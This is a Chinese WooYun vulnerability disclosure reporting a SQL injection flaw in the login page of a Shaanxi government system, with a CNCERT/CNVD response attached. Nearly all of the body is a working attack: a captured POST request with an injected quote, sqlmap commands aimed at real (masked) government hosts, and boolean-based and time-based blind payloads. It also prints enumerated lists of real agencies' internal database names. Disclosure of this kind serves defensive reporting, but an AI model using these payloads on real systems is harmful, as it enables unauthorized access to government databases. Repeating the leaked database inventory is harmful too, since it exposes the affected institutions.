当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134920

漏洞标题:某政府在用系统通用型sql

相关厂商:cncert

漏洞作者: Hero

提交时间:2015-08-20 16:21

修复时间:2015-11-19 18:18

公开时间:2015-11-19 18:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向第三方安全合作伙伴开放
2015-10-15: 细节向核心白帽子及相关领域专家公开
2015-10-25: 细节向普通白帽子公开
2015-11-04: 细节向实习白帽子公开
2015-11-19: 细节向公众公开

简要描述:

sql注入

详细说明:

陕西某政府在用系统通用sql注入
漏洞页面: ysqgk/login.asp
http://**.**.**.**/admin/pub_newschannel.asp?chid=100231
在这里登陆处发现
抓包

POST /ysqgk/login.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://**.**.**.**/admin/pub_newschannel.asp?chid=100231
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 28
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDACTSBDCC=APHFBDFACLDJEMKNDHOANCJM; gwdshare_firstime=1439837305250; _gscu_1224393726=398373024hz5wj15; _gscs_1224393726=398373025lp26e15|pv:19; _gscbrs_1224393726=1; _gscu_1199456620=398373021ffydw15; _gscs_1199456620=39837302emg2ys15|pv:19; _gscbrs_1199456620=1
username=1111%27&password=11


以下是gov的案例
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
.......

C:\Python27\sqlmap>sqlmap.py -r c:/1.txt
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mut
consent is illegal. It is the end user's responsibility to obey all applicab
local, state and federal laws. Developers assume no liability and are not res
sible for any misuse or damage caused by this program
[*] starting at 03:01:38
[03:01:38] [INFO] parsing HTTP request from 'c:/1.txt'
[03:01:39] [WARNING] it appears that you have provided tainted parameter valu
('username=1111'') with most probably leftover chars/statements from manual S
injection test(s). Please, always use only valid parameter values so sqlmap c
d be able to properly run
Are you sure you want to continue? [y/N] y
[03:01:41] [INFO] testing connection to the target URL
[03:01:41] [WARNING] the web server responded with an HTTP error code (500) w
h could interfere with the results of the tests
[03:01:41] [INFO] testing if the target URL is stable. This can take a couple
seconds
[03:01:42] [INFO] target URL is stable
[03:01:42] [INFO] testing if POST parameter 'username' is dynamic
[03:01:42] [WARNING] POST parameter 'username' does not appear dynamic
[03:01:42] [WARNING] heuristic (basic) test shows that POST parameter 'userna
might not be injectable
[03:01:42] [INFO] testing for SQL injection on POST parameter 'username'
[03:01:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:01:42] [INFO] POST parameter 'username' is 'AND boolean-based blind - WHE
or HAVING clause' injectable
[03:01:43] [INFO] heuristic (extended) test shows that the back-end DBMS coul
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provide
evel (1) and risk (1)? [Y/n] y
[03:01:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING cla
'
[03:01:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING claus
[03:01:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHER
r HAVING clause'
[03:01:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHER
r HAVING clause (IN)'
[03:01:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (X
ype)'
[03:01:46] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE
HAVING clause'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE
HAVING clause (IN)'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Paramete
eplace'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Paramete
eplace (integer column)'
[03:01:47] [INFO] testing 'MySQL inline queries'
[03:01:47] [INFO] testing 'PostgreSQL inline queries'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[03:01:47] [INFO] testing 'Oracle inline queries'
[03:01:47] [INFO] testing 'SQLite inline queries'
[03:01:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:01:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:01:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:01:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:01:47] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (
vy query)'
[03:01:48] [INFO] POST parameter 'username' is 'Microsoft SQL Server/Sybase A
time-based blind (heavy query)' injectable
[03:01:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:01:48] [INFO] automatically extending ranges for UNION query injection te
ique tests as there is at least one other potential injection technique found
POST parameter 'username' is vulnerable. Do you want to keep testing the othe
(if any)? [y/N] u
sqlmap identified the following injection points with a total of 62 HTTP(s) r
ests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1111' AND 1217=1217&password=11
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: username=1111' AND 6858=(SELECT COUNT(*) FROM sysusers AS sys1,s
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS s
,sysusers AS sys7)&password=11
---
[03:01:51] [INFO] testing Microsoft SQL Server
[03:01:51] [WARNING] the back-end DBMS is not Microsoft SQL Server
[03:01:51] [INFO] testing MySQL
[03:01:51] [WARNING] the back-end DBMS is not MySQL
[03:01:51] [INFO] testing Oracle
[03:01:51] [WARNING] the back-end DBMS is not Oracle
[03:01:51] [INFO] testing PostgreSQL
[03:01:51] [WARNING] the back-end DBMS is not PostgreSQL
[03:01:51] [INFO] testing SQLite
[03:01:51] [WARNING] the back-end DBMS is not SQLite
[03:01:51] [INFO] testing Microsoft Access
[03:01:51] [WARNING] the back-end DBMS is not Microsoft Access
[03:01:51] [INFO] testing Firebird
[03:01:51] [WARNING] the back-end DBMS is not Firebird
[03:01:51] [INFO] testing SAP MaxDB
[03:01:51] [WARNING] the back-end DBMS is not SAP MaxDB
[03:01:51] [INFO] testing Sybase
[03:01:51] [WARNING] the back-end DBMS is not Sybase
[03:01:51] [INFO] testing IBM DB2
[03:01:51] [WARNING] the back-end DBMS is not IBM DB2
[03:01:51] [CRITICAL] sqlmap was not able to fingerprint the back-end databas
anagement system. Support for this DBMS will be implemented at some point
[03:01:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 68 times
[*] shutting down at 03:01:51
C:\Python27\sqlmap>sqlmap.py -r c:/1.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mut
consent is illegal. It is the end user's responsibility to obey all applicab
local, state and federal laws. Developers assume no liability and are not res
sible for any misuse or damage caused by this program
[*] starting at 03:01:55
[03:01:55] [INFO] parsing HTTP request from 'c:/1.txt'
[03:01:55] [WARNING] it appears that you have provided tainted parameter valu
('username=1111'') with most probably leftover chars/statements from manual S
injection test(s). Please, always use only valid parameter values so sqlmap c
d be able to properly run
Are you sure you want to continue? [y/N] y
[03:01:58] [INFO] testing connection to the target URL
[03:01:58] [WARNING] the web server responded with an HTTP error code (500) w
h could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) re
sts:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1111' AND 1217=1217&password=11
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: username=1111' AND 6858=(SELECT COUNT(*) FROM sysusers AS sys1,s
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS s
,sysusers AS sys7)&password=11
---
[03:01:58] [INFO] testing Microsoft SQL Server
[03:01:58] [INFO] confirming Microsoft SQL Server
[03:01:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[03:01:58] [INFO] fetching database names
[03:01:58] [INFO] fetching number of databases
[03:01:58] [WARNING] running in a single-thread mode. Please consider usage o
ption '--threads' for faster data retrieval
[03:01:58] [INFO] retrieved: 24
[03:01:59] [INFO] retrieved:
[03:02:05] [INFO] retrieved:
[03:02:05] [WARNING] it is very important not to stress the network adapter's
ndwidth during usage of time-based payloads
[03:02:06] [WARNING] in case of continuous data retrieval problems you are ad
ed to try a switch '--no-cast' or switch '--hex'
[03:02:06] [INFO] retrieved:
[03:02:13] [INFO] retrieved:
[03:02:14] [INFO] retrieved:
[03:02:21] [INFO] retrieved:
[03:02:22] [INFO] retrieved:
[03:02:31] [INFO] retrieved:
[03:02:31] [INFO] retrieved:
[03:02:38] [INFO] retrieved:
[03:02:39] [INFO] retrieved:
[03:02:53] [INFO] retrieved:
[03:02:53] [INFO] retrieved:
[03:03:01] [INFO] retrieved:
[03:03:01] [INFO] retrieved:
[03:03:09] [INFO] retrieved:
[03:03:09] [INFO] retrieved:
[03:03:18] [INFO] retrieved:
[03:03:18] [INFO] retrieved:
[03:03:26] [INFO] retrieved:
[03:03:26] [INFO] retrieved:
[03:03:34] [INFO] retrieved:
[03:03:34] [INFO] retrieved:
[03:03:41] [INFO] retrieved:
[03:03:42] [INFO] retrieved:
[03:03:49] [INFO] retrieved:
[03:03:50] [INFO] retrieved:
[03:03:57] [INFO] retrieved:
[03:03:58] [INFO] retrieved:
[03:04:05] [INFO] retrieved:
[03:04:06] [INFO] retrieved:
[03:04:13] [INFO] retrieved:
[03:04:14] [INFO] retrieved:
[03:04:21] [INFO] retrieved:
[03:04:21] [INFO] retrieved:
[03:04:28] [INFO] retrieved:
[03:04:29] [INFO] retrieved:
[03:04:36] [INFO] retrieved:
[03:04:37] [INFO] retrieved:
[03:04:44] [INFO] retrieved:
[03:04:45] [INFO] retrieved:
[03:04:53] [INFO] retrieved:
[03:04:54] [INFO] retrieved:
[03:05:01] [INFO] retrieved:
[03:05:02] [INFO] retrieved:
[03:05:09] [INFO] retrieved:
[03:05:10] [INFO] retrieved:
[03:05:18] [INFO] retrieved:
[03:05:18] [INFO] retrieved: guoziwei2012
[03:05:22] [INFO] retrieved: master
[03:05:25] [INFO] retrieved: tempdb
[03:05:27] [INFO] retrieved: model
[03:05:29] [INFO] retrieved: msdb
[03:05:30] [INFO] retrieved: ReportServer
[03:05:38] [INFO] retrieved: ReportServerTempDB
[03:05:47] [INFO] retrieved: shaanxihrss2013
[03:05:52] [INFO] retrieved: smtedb_new
[03:05:56] [INFO] retrieved: snepb2011
[03:05:59] [INFO] retrieved: snsafety2011
[03:06:03] [INFO] retrieved: shaanxicoop
[03:06:07] [INFO] retrieved: wst_2013
[03:06:10] [INFO] retrieved: guoziwei2012
[03:06:14] [INFO] retrieved: gwy2013
[03:06:16] [INFO] retrieved: SWTold
[03:06:19] [INFO] retrieved: sxdofcom2014
[03:06:25] [INFO] retrieved: fgwkhdata
[03:06:30] [INFO] retrieved: wjjkhdata
[03:06:33] [INFO] retrieved: sxikhdata
[03:06:36] [INFO] retrieved: webxbcq
[03:06:39] [INFO] retrieved: gcpm@xbcq2015
[03:06:43] [INFO] retrieved: sndrc2015
[03:06:46] [INFO] retrieved: sndrc2008
[03:06:50] [INFO] retrieved: sndrc2008bak
[03:06:54] [INFO] retrieved:
available databases [24]:
[*] fgwkhdata
[*] gcpm@xbcq2015
[*] guoziwei2012
[*] gwy2013
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] shaanxicoop
[*] shaanxihrss2013
[*] smtedb_new
[*] sndrc2008
[*] sndrc2008bak
[*] sndrc2015
[*] snepb2011
[*] snsafety2011
[*] SWTold
[*] sxdofcom2014
[*] sxikhdata
[*] tempdb
[*] webxbcq
[*] wjjkhdata
[*] wst_2013
[03:06:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4124 times
[03:06:55] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap
tput\**.**.**.**'
[*] shutting down at 03:06:55


C:\Python27\sqlmap>sqlmap.py -r c:/2.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 03:04:43
[03:04:43] [INFO] parsing HTTP request from 'c:/2.txt'
[03:04:43] [WARNING] it appears that you have provided tainted parameter values
('username=1111'') with most probably leftover chars/statements from manual SQL
injection test(s). Please, always use only valid parameter values so sqlmap coul
d be able to properly run
Are you sure you want to continue? [y/N] y
[03:04:47] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:04:47] [INFO] testing connection to the target URL
[03:04:47] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1111' AND 4646=4646&password=11
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: username=1111' AND 2074=(SELECT COUNT(*) FROM sysusers AS sys1,sysu
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6
,sysusers AS sys7)&password=11
Place: POST
Parameter: password
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1111'&password=11 AND 2078=2078
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: username=1111'&password=11 AND 8073=(SELECT COUNT(*) FROM sysusers
AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysu
sers AS sys6,sysusers AS sys7)
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: password, type: Unescaped numeric (default)
[1] place: POST, parameter: username, type: Unescaped numeric
[q] Quit
> 1
[03:04:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[03:04:48] [INFO] fetching database names
[03:04:48] [INFO] fetching number of databases
[03:04:48] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[03:04:48] [INFO] retrieved: 35
[03:04:49] [INFO] retrieved:
[03:04:56] [INFO] retrieved:
[03:04:56] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[03:04:56] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[03:04:56] [INFO] retrieved:
[03:05:04] [INFO] retrieved:
[03:05:04] [INFO] retrieved:
[03:05:12] [INFO] retrieved:
[03:05:12] [INFO] retrieved:
[03:05:20] [INFO] retrieved:
[03:05:20] [INFO] retrieved:
[03:05:28] [INFO] retrieved:
[03:05:29] [INFO] retrieved:
[03:05:36] [INFO] retrieved:
[03:05:36] [INFO] retrieved:
[03:05:44] [INFO] retrieved:
[03:05:45] [INFO] retrieved:
[03:05:52] [INFO] retrieved:
[03:05:53] [INFO] retrieved:
[03:06:00] [INFO] retrieved:
[03:06:01] [INFO] retrieved:
[03:06:08] [INFO] retrieved:
[03:06:08] [INFO] retrieved:
[03:06:16] [INFO] retrieved:
[03:06:16] [INFO] retrieved:
[03:06:25] [INFO] retrieved:
[03:06:26] [INFO] retrieved:
[03:06:33] [INFO] retrieved:
[03:06:34] [INFO] retrieved:
[03:06:41] [INFO] retrieved:
[03:06:42] [INFO] retrieved:
[03:06:49] [INFO] retrieved:
[03:06:50] [INFO] retrieved:
[03:06:58] [INFO] retrieved:
[03:06:59] [INFO] retrieved:
[03:07:06] [INFO] retrieved:
[03:07:07] [INFO] retrieved:
[03:07:14] [INFO] retrieved:
[03:07:15] [INFO] retrieved:
[03:07:22] [INFO] retrieved:
[03:07:23] [INFO] retrieved:
[03:07:30] [INFO] retrieved:
[03:07:31] [INFO] retrieved:
[03:07:38] [INFO] retrieved:
[03:07:39] [INFO] retrieved:
[03:07:46] [INFO] retrieved:
[03:07:46] [INFO] retrieved:
[03:07:54] [INFO] retrieved:
[03:07:54] [INFO] retrieved:
[03:08:02] [INFO] retrieved:
[03:08:02] [INFO] retrieved:
[03:08:10] [INFO] retrieved:
[03:08:10] [INFO] retrieved:
[03:08:18] [INFO] retrieved:
[03:08:18] [INFO] retrieved:
[03:08:30] [INFO] retrieved:
[03:08:31] [INFO] retrieved:
[03:08:38] [INFO] retrieved:
[03:08:39] [INFO] retrieved:
[03:08:46] [INFO] retrieved:
[03:08:47] [INFO] retrieved:
[03:08:54] [INFO] retrieved:
[03:08:55] [INFO] retrieved:
[03:09:02] [INFO] retrieved:
[03:09:03] [INFO] retrieved:
[03:09:10] [INFO] retrieved:
[03:09:11] [INFO] retrieved:
[03:09:18] [INFO] retrieved:
[03:09:19] [INFO] retrieved:
[03:09:26] [INFO] retrieved:
[03:09:27] [INFO] retrieved:
[03:09:34] [INFO] retrieved:
[03:09:35] [INFO] retrieved: zxsc
[03:09:36] [INFO] retrieved: master
[03:09:39] [INFO] retrieved: tempdb
[03:09:41] [INFO] retrieved: model
[03:09:43] [INFO] retrieved: msdb
[03:09:45] [INFO] retrieved: ReportServer
[03:09:49] [INFO] retrieved: ReportServerTempDB
[03:09:55] [INFO] retrieved: ltry
[03:09:57] [INFO] retrieved: tongjianban
[03:10:01] [INFO] retrieved: jbzx2013
[03:10:04] [INFO] retrieved: ggb_xitong
[03:10:08] [INFO] retrieved: wdb_sndrc
[03:10:12] [INFO] retrieved: xijingjituan
[03:10:17] [INFO] retrieved: sxzb2013
[03:10:20] [INFO] retrieved: smte_apple
[03:10:23] [INFO] retrieved: qzlxdj
[03:10:26] [INFO] retrieved: qinling2012
[03:10:30] [INFO] retrieved: sxcdc2014
[03:10:33] [INFO] retrieved: zxsc
[03:10:34] [INFO] retrieved: fupinban
[03:10:37] [INFO] retrieved: sxca2013
[03:10:40] [INFO] retrieved: SmeVote
[03:10:43] [INFO] retrieved: sxsgjldb2015
[03:10:47] [INFO] retrieved: qzlxrd
[03:10:50] [INFO] retrieved: shxshbz2014
[03:10:54] [INFO] retrieved: xatz2013
[03:10:57] [INFO] retrieved: jkjy2013
[03:11:00] [INFO] retrieved: glxt_2013
[03:11:03] [INFO] retrieved: gbpx
[03:11:05] [INFO] retrieved: sndrc_Info
[03:11:08] [INFO] retrieved: gufei2013
[03:11:12] [INFO] retrieved: sxlawyer2014
[03:11:16] [INFO] retrieved: loan_sndrc
[03:11:20] [INFO] retrieved: gbpx_bak
[03:11:23] [INFO] retrieved: smte_kh
[03:11:25] [INFO] retrieved: sndrc_gj
[03:11:28] [INFO] retrieved:
available databases [35]:
[*] fupinban
[*] gbpx
[*] gbpx_bak
[*] ggb_xitong
[*] glxt_2013
[*] gufei2013
[*] jbzx2013
[*] jkjy2013
[*] loan_sndrc
[*] ltry
[*] master
[*] model
[*] msdb
[*] qinling2012
[*] qzlxdj
[*] qzlxrd
[*] ReportServer
[*] ReportServerTempDB
[*] shxshbz2014
[*] SmeVote
[*] smte_apple
[*] smte_kh
[*] sndrc_gj
[*] sndrc_Info
[*] sxca2013
[*] sxcdc2014
[*] sxlawyer2014
[*] sxsgjldb2015
[*] sxzb2013
[*] tempdb
[*] tongjianban
[*] wdb_sndrc
[*] xatz2013
[*] xijingjituan
[*] zxsc
[03:11:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5846 times
[03:11:29] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\**.**.**.**'
[*] shutting down at 03:11:29


C:\Python27\sqlmap>sqlmap.py -r c:/3.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 03:16:28
[03:16:28] [INFO] parsing HTTP request from 'c:/3.txt'
[03:16:29] [WARNING] it appears that you have provided tainted parameter values
('username=1111'') with most probably leftover chars/statements from manual SQL
injection test(s). Please, always use only valid parameter values so sqlmap coul
d be able to properly run
Are you sure you want to continue? [y/N] y
[03:16:30] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:16:30] [INFO] testing connection to the target URL
[03:16:30] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: password
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1111'&password=11 AND 3153=3153
---
[03:16:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[03:16:30] [INFO] fetching database names
[03:16:30] [INFO] fetching number of databases
[03:16:30] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[03:16:30] [INFO] retrieved: 24
[03:16:31] [INFO] retrieved:
[03:16:39] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[03:16:39] [INFO] retrieved:
[03:16:47] [INFO] retrieved:
[03:16:57] [INFO] retrieved:
[03:17:06] [INFO] retrieved:
[03:17:15] [INFO] retrieved:
[03:17:23] [INFO] retrieved:
[03:17:32] [INFO] retrieved:
[03:17:42] [INFO] retrieved:
[03:17:50] [INFO] retrieved:
[03:17:59] [INFO] retrieved:
[03:18:07] [INFO] retrieved:
[03:18:16] [INFO] retrieved:
[03:18:26] [INFO] retrieved:
[03:18:34] [INFO] retrieved:
[03:18:43] [INFO] retrieved:
[03:18:51] [INFO] retrieved:
[03:19:00] [INFO] retrieved:
[03:19:08] [INFO] retrieved:
[03:19:18] [INFO] retrieved:
[03:19:30] [INFO] retrieved:
[03:19:39] [INFO] retrieved:
[03:19:47] [INFO] retrieved:
[03:19:57] [INFO] retrieved:
[03:20:06] [INFO] retrieved: shaanxihrss2013
[03:20:12] [INFO] retrieved: master
[03:20:15] [INFO] retrieved: tempdb
[03:20:18] [INFO] retrieved: model
[03:20:20] [INFO] retrieved: msdb
[03:20:22] [INFO] retrieved: ReportServer
[03:20:27] [INFO] retrieved: ReportServerTempDB
[03:20:36] [INFO] retrieved: shaanxihrss2013
[03:20:45] [INFO] retrieved: smtedb_new
[03:20:50] [INFO] retrieved: snepb2011
[03:20:53] [INFO] retrieved: snsafety2011
[03:20:59] [INFO] retrieved: shaanxicoop
[03:21:03] [INFO] retrieved: wst_2013
[03:21:07] [INFO] retrieved: guoziwei2012
[03:21:12] [INFO] retrieved: gwy2013
[03:21:15] [INFO] retrieved: SWTold
[03:21:17] [INFO] retrieved: sxdofcom2014
[03:21:23] [INFO] retrieved: fgwkhdata
[03:21:28] [INFO] retrieved: wjjkhdata
[03:21:32] [INFO] retrieved: sxikhdata
[03:21:36] [INFO] retrieved: webxbcq
[03:21:39] [INFO] retrieved: gcpm@xbcq2015
[03:21:44] [INFO] retrieved: sndrc2015
[03:21:48] [INFO] retrieved: sndrc2008
[03:21:52] [INFO] retrieved: sndrc2008bak
[03:21:57] [INFO] retrieved:
available databases [24]:
[*] fgwkhdata
[*] gcpm@xbcq2015
[*] guoziwei2012
[*] gwy2013
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] shaanxicoop
[*] shaanxihrss2013
[*] smtedb_new
[*] sndrc2008
[*] sndrc2008bak
[*] sndrc2015
[*] snepb2011
[*] snsafety2011
[*] SWTold
[*] sxdofcom2014
[*] sxikhdata
[*] tempdb
[*] webxbcq
[*] wjjkhdata
[*] wst_2013
[03:21:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3964 times
[03:21:58] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\**.**.**.**'
[*] shutting down at 03:21:58


}%BOPS2G}S`~]XH)Q[82Q98.png

漏洞证明:

rt

修复方案:

过滤

版权声明:转载请注明来源 Hero@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-21 18:16

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无